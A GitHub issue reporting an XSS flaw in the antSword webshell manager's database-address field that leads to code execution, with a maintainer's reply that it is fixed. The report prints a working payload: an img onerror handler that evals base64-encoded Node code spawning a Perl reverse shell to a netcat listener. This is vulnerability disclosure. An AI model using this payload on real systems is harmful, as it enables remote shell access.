Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

antSword self-XSS Vulnerability leads to Code Execution #151

Closed
miaochiahao opened this issue Apr 18, 2019 · 1 comment

Comments

@miaochiahao
Copy link

commented Apr 18, 2019

除了已知问题,这里还有一处输入点没有过滤,能够造成XSS并执行命令。

在主页添加一个shell,右键点击数据操作,进入数据库管理页面

屏幕快照 2019-04-18 下午6 32 40

在数据库地址处输入payload,这里的输入点没有过滤,直接执行

localhost<img src onerror="eval(new Buffer(`cmVxdWlyZSgnY2hpbGRfcHJvY2VzcycpLmV4ZWMoJ3BlcmwgLWUgXCd1c2UgU29ja2V0OyRpPSIxMjcuMC4w LjEiOyRwPTEwMDI7c29ja2V0KFMsUEZfSU5FVCxTT0NLX1NUUkVBTSxnZXRwcm90b2J5bmFtZSgidGNwIikpO2lmKGNvbm5lY3QoU yxzb2NrYWRkcl9pbigkcCxpbmV0X2F0b24oJGkpKSkpe29wZW4oU1RESU4sIj4mUyIpO29wZW4oU1RET1VULCI+JlMiKTtvcGVuKF NUREVSUiwiPiZTIik7ZXhlYygiL2Jpbi9iYXNoIC1pIik7fTtcJycsKGVycm9yLCBzdGRvdXQsIHN0ZGVycik9PnsKICAgIGFsZXJ 0KGBzdGRvdXQ6ICR7c3Rkb3V0fWApOwogIH0pOw==`,`base64`).toString())">

屏幕快照 2019-04-18 下午6 33 28

开启nc监听1002端口,即可接到反弹的shell

屏幕快照 2019-04-18 下午6 35 07

或者你只想弹个窗也行

屏幕快照 2019-04-18 下午6 35 46

self-xss也请修复一下 :D

@Medicean

This comment has been minimized.

Copy link
Collaborator

commented Apr 18, 2019

感谢反馈, 已修复

@miaochiahao miaochiahao changed the title antSword self-XSS Vulnerability leads to RCE antSword self-XSS Vulnerability leads to Code Execution Apr 18, 2019

@Medicean Medicean added this to Done in AntSword-v2.1 Apr 26, 2019

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
2 participants
You can’t perform that action at this time.